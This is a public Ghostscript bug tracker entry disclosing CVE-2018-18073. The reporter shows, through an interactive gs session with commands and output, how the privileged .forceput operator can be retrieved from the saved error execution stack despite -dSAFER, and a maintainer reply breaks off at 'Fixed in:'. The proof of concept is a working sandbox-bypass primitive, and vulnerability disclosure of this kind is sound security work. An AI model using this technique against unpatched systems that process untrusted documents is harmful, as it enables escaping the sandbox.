Bug 699927 - .setglobal exposes dangerous operators in saved estack
Summary: .setglobal exposes dangerous operators in saved estack
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: Security (public) (show other bugs)
Version: unspecified
Hardware: PC Linux
: P4 critical
Assignee: Chris Liddell (chrisl)
Depends on:
Reported: 2018-10-09 14:08 UTC by Tavis Ormandy
Modified: 2019-05-08 13:44 UTC (History)
0 users

See Also:
Word Size: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy 2018-10-09 14:08:43 UTC
I've found a way of getting access to .forceput even after the fix in bug 699816, you can pull it out of the saved execution stack in $error:

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) (r) --.systemvmfile--} --stopped-- {--pop-- --pop-- $error /errorname --get-- /undefinedfilename --eq-- {.clearerror --exit--} --if-- /handleerror --.systemvar-- --exec-- null} --if-- --cvx-- {.runexec} .execute --pop--} --%loop_continue-- {--pop--} {$error /newerror --get-- --and-- {/handleerror --.systemvar-- --exec-- --flush-- true} {false} --ifelse--} false 1 --%stopped_push-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1919 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]

Notice the .forceput in there...

GS>$error /estack get 29 get ==
{-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}
GS>$error /estack get 29 get 6 get ==

See bug 699816 for a full exploit using .forceput
Comment 1 Tavis Ormandy 2018-10-09 14:37:49 UTC
This is CVE-2018-18073
Comment 2 Chris Liddell (chrisl) 2018-10-10 16:20:57 UTC
Fixed in: